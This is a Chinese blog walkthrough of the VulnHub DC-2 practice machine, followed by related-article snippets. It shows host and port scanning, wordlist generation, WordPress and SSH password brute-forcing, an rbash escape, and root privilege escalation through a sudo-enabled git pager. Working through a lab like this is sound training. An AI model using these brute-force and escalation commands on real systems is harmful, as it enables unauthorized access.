【vulnhub】DC系列之DC-2渗透测试

最新推荐文章于 2024-09-27 20:30:07 发布
最新推荐文章于 2024-09-27 20:30:07 发布
阅读量349 收藏
点赞数
分类专栏: 靶机渗透 文章标签: 渗透 dc-2
只能看不能摸哟!
本文链接:https://blog.csdn.net/weixin_45677145/article/details/111770201
版权

文章目录

一、实验环境

目标靶机:DC-2,NAT模式
在这里插入图片描述
攻击机:kali,NAT模式,IP:192.168.35.131

二、实验要求

与DC-1一样,共有五个flag,包括最终flag。拿到就算过关!

三、渗透过程

主机发现:

使用nmap扫描当前网段存活主机:

nmap -sP 192.168.35.0/24 -oN nmap.sP

在这里插入图片描述
也可以使用如下命令:有点慢不建议使用

netdiscover -i eth0 -r 192.168.35.0/24

在这里插入图片描述
也可以使用这个命令:

arp-scan -l

在这里插入图片描述
经过简单分析发现目标靶机的IP为:192.168.35.150

端口扫描与操作系统识别:

nmap -p 1-65535 -sV 192.168.35.150 -O -oN nmap.sV

在这里插入图片描述

web指纹识别:
在这里插入图片描述

发现开放了80端口,用浏览器访问试试看:发现不能访问

由于DC-2的特殊(强制域名访问),所以我们需要绑定一下hosts文件:
在这里插入图片描述
重新访问:发现是基于WordPress开发的网站
在这里插入图片描述
flag1 get!提示我们登录来查看下一个标志,但是我们的字典可能没有效,需要使用cewl工具来生成字典

cewl工具会自动爬行网站的网页,根据网页的关键字生成一个字典(将它作为密码字典)

cewl dc-2 > pwd.dic

在这里插入图片描述
目录扫描:

msfconsole
use auxiliary/scanner/http/dir_scanner
set rhosts 192.168.35.150
set threads 50
exploit

在这里插入图片描述
在这里插入图片描述

dirb http://dc-2

在这里插入图片描述

收集到的信息

  • IP:192.168.35.150

  • 开放的端口:

    • 80 => http服务----Apache httpd 2.4.10 ((Debian))
    • 7744 => ssh服务----OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

  • OS:Debian(Linux 3.2 - 4.9)

  • CMS:WordPress[4.7.10]

  • Apache:2.4.10

  • Linux kernel:3/4

  • 扫描出来的目录

使用wpscan工具来猜解用户名:

wpscan --url dc-2 -e u
列出可能的用户名

在这里插入图片描述

在这里插入图片描述

将猜解出来的用户名存为一个字典(用户字典)
在这里插入图片描述

使用wpscan进行爆破:

wpscan --url dc-2 -U user.dic -P pwd.dic

在这里插入图片描述
得到两组密码:

jerry/adipiscing
tom/parturient

在登录界面尝试登录:根据目录扫描得出登录的页面
在这里插入图片描述
发现重定向到wp-login.php页面,所以真正的登陆页面就是这个
在这里插入图片描述

  • 登录tom
    在这里插入图片描述

没有找到有用的信息

  • 登录jerry
    在这里插入图片描述
    在这里插入图片描述

flag2 get!提示如果不能攻击WordPress 可以换一种方法,想到开放的7744端口

我们使用hydra进行ssh爆破:有点慢

hydra -L user.dic -P pwd.dic ssh://192.168.35.150 -s 7744 -o hydra.ssh -vV

扫描完之后我们查看结果:
在这里插入图片描述

使用得到的账户密码进行ssh连接:

ssh tom@192.168.35.150 -p 7744

在这里插入图片描述
发现flag3,但是不能查看:
在这里插入图片描述

当前使用的是rbash,我们输入以下命令绕过限制:

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

前面两句是进行绕过,后面两句是设置环境变量

在这里插入图片描述
flag3 get!,提示可怜的老汤姆总是追着杰瑞跑。也许他应该忍受他造成的所有压力。直接将线索引向另一个账户。

我们查看/etc/passwd看有没有jerry这个用户:
在这里插入图片描述
发现有这个用户,我们使用su 命令来进行账号切换:

su jerry

在这里插入图片描述
输入密码后登陆成功,进入自己的根目录,发现flag4:
在这里插入图片描述
flag4 get!翻译一下看说的什么玩意儿:

很高兴看到你已经走了这么远——但你还没有回家。
你仍然需要得到最终的标志(唯一真正重要的标志!!)
这里没有提示,你得靠自己了。: -)
走吧,滚出去!!!!

WTF,大概意思就是我们不是root权限,自己想办法提权去吧(好家伙,提示应该是这个git命令)

提权:

我们使用sudo -l 查看一下:
在这里插入图片描述
发现git命令在使用过程中是root权限,而且不需要输入密码

sudo git -p --help    强制进入交互状态,让页面缓冲区无法显示全部信息(放大字体即可)
!/bin/bash    这时候调用一下/bin/bash

注意:一定要放大字体让页面无法显示全部信息,否则无法进入强制交互状态

在这里插入图片描述
直接获得root权限,final-flag get!完成渗透

sudo命令

sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的 root 命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录和管理时间,同样也提高了安全性。
sudo不是对shell的一个代替,它是面向每个命令的。

原理:

sudo使一般用户不需要知道超级用户的密码即可获得权限。

首先超级用户将普通用户的名字、可以执行的特定命令、按照哪种用户或用户组的身份执行等信息,登记在特殊的文件中(通常是/etc/sudoers),即完成对该用户的授权(此时该用户称为“sudoer”);在一般用户需要取得特殊权限时,其可在命令前加上“sudo”,此时sudo将会询问该用户自己的密码(以确认终端机前的是该用户本人),回答后系统即会将该命令的进程以超级用户的权限运行。之后的一段时间内(默认为5分钟,可在/etc/sudoers自定义),使用sudo不需要再次输入密码。

参数:

参数作用
-V显示版本编号
-h会显示版本编号及指令的使用方式说明
-l显示出自己(执行 sudo 的使用者)的权限
-v因为 sudo 在第一次执行时或是在 N 分钟内没有执行(N 预设为五)会问密码,这个参数是重新做一次确认,如果超过 N 分钟,也会问密码
-k将会强迫使用者在下一次执行 sudo 时问密码(不论有没有超过 N 分钟)
-b将要执行的指令放在背景执行

本文中是由于sudo配置不当,git命令被设置为sudo root权限,并且设置为NOPASSWD,才可以使用git进行提权。

我是大肥鼠
关注
专栏目录
vulnhubDC系列DC-1渗透测试
Hi~ 土拨鼠
12-26 809
文章目录实验环境实验要求渗透过程文件搜索命令find文件特殊权限setUID 实验环境 目标靶机:DC-1,NAT模式 攻击机:kali,NAT模式,IP:192.168.35.131 实验要求 靶机中一共有五个flag文件,我们需要找到它们,即可完成任务。 渗透过程 使用nmap扫描当前网段存活主机: nmap -sP 192.168.35.0/24 -oN nmap.sP 简单分析可知靶机IP为192.168.35.147 使用nmap对靶机进行端口扫描: nmap -p 1-65535 -sV 1
uml识别事件表格_狗脸识别玩过吗?入睡后自动停播的音乐..
weixin_39932330的博客
12-13 357
黑马家族成员摘录,转载请注明出处-------------------------------------------第 20 期感谢大家对我们产品体验日记栏目的关注,本周我们黑马家族的小伙伴们发现了哪些被你忽略的小细节呢?01、芒果TV观影长按提高倍速芒果TV观看视频时,长按屏幕能开启倍速播放,通过长按屏幕时间的长短来控制倍速的大小。小胡 摘录02、微信群聊接龙,增强互动性微信群聊上线...
Vulnhub靶机渗透测试——DC-2
Cobra的博客
04-19 2346
一、实验环境 靶机(ubuntu):192.168.189.177 攻击机(kali): 192.168.189.148 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 二、信息收集 1、利用nmap扫描存活主机 nmap 192.168.189.0/24 2、发现主机192.168.189.177开放了80端口,在对其进行全端口扫描 nmap -p1-65535 192.168.189.177 3、访问其80端口发现不能正常访问到其站点 4、可能是DN
DC-2靶场详细教程
最新发布
2301_77518341的博客
09-27 2244
DC-2靶场实验报告一、环境搭建:1. 靶场描述靶场描述与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-15 2616
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-2 渗透测试
Darklord.W
04-13 544
DC-2渗透测试 0x00实验环境 靶机:DC-2,IP地址:192.168.8.133 测试机:Kali,IP地址:192.168.8.128; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 Masscan以及nmap扫描 修改hosts文件,访问web 发现是wordpress的CMS并得到提示需要cewl制作针...
漏洞渗透测试实验——基于VulnHub平台
weixin_44186821的博客
08-30 788
DC1漏洞渗透测试实验
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-2简单理解
qq_43717836的博客
03-12 2547
前提: 信息安全初学者一枚,正在努力提升中。。。。 今天渗透实验靶场,是VulnhubDC-2,和之前的DC-1是同系列的。 环境介绍 成功安装virtual Box,只需要下载vlunhubDC-2项目,导入virtual中即可使用,不需要登录什么的。 渗透 0x01 老样子,打开你的kali,直接nmap,使用参数-Pn扫描网段 nmap -Pn 192.168.3.0/24 继续扫...
DC-2 实验靶场步骤讲解
2401_84693907的博客
09-26 1075
值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。输入wpscan --url http://dc-2 --enumerate u。
064 渗透测试实战,靶机 DC-2
鸡蛋炒鸡蛋
04-23 1041
文章目录一:环境准备二:flag1三:flag2四:flag3五:flag4六:flag5 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1 打开DC-2 打开Kali nmap 扫描局域网主机 nmap -sP 192.168.100.0/24 -oN nmap.sP 确定主机之后,对主机进行端口扫描: nmap -A 192.168.100.8 -p 1-65535 -oN nmap.A 发现开放了80和7744端口号。 开放了80端口号,所以这时候
靶机渗透测试实战(二)——DC-2
weixin_45116657的博客
10-03 5396
1、确定目标主机、详细信息 1.1> 命令:arp-scan -l ——> 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)。它可以构造并发送ARP请求到指定的IP地址,并且显示返回的任何响应。 arp-scan 可以显示本地网络中的所有连接设备,即使这些设备有防火墙。设...
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1915
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
DC-2靶场实战详解
热门推荐
a310034188的博客
11-30 1万+
DC-2 写写自己打DC-2的过程 使用工具 kali DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/ 环境配置。 我这里的话kali和DC-2都是nat模式 kali IP为:192.168.28.139 DC-2 IP设置为nat模式,具体多少暂时也不知道。 信息收集 查找 DC-2 IP arp-scan -l 得到DC-2 IP为:192.168.28.179 扫描开启的端口 nmap -A -p1-65535 198.13.51.
DC-2
0XAXSDD的博客
06-01 465
DC-2 靶机渗透实战 开启DC-2靶机,使用nmap对端口进行全扫描: 发现开放了80和7744端口,这里7747是ssh服务22端口改过来的 浏览器浏览web服务,发现是WordPress 这里有个小坑,这里你虚拟机开启之后,你用浏览器通过ip地址去浏览web网页是可以的,但是一个页面跳转,就会自动把ip换成dc-2这个域名,这时候你本地没有DNS解析记录,就会访问失败,所有先给本地的host文件增加DNS解析记录,就可以正常访问web网站了,这后面扫描也是必须通过域名来扫描! 然后找到第一个fl
vulnhub靶机DC-2
cyzCc的博客
02-16 515
DC系列靶机2-9百度网盘下载链接链接:https://pan.baidu.com/s/1BHatml6HHnT-jsoZ-eHfsw 提取码:1xft 和DC1一样,先主机发现找到靶机的ip 使用nmap nmap -sP 192.168.211.0/24 根据MAC地址可以确定靶机的ip为192.168.211.134 然后扫描该ip所开放的端口服务 nmap -A 192.168.211....
华普莱特HDE系列DC-DC电源模块技术规格
"华普莱特HDE系列DC-DC电源模块是北京华普莱特科技发展有限公司推出的大功率模块电源产品,适用于多种电压输入范围,具有高效能、高稳定性的特点。产品手册提供了详细的技术参数和选型指导,包括模块的外形尺寸、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值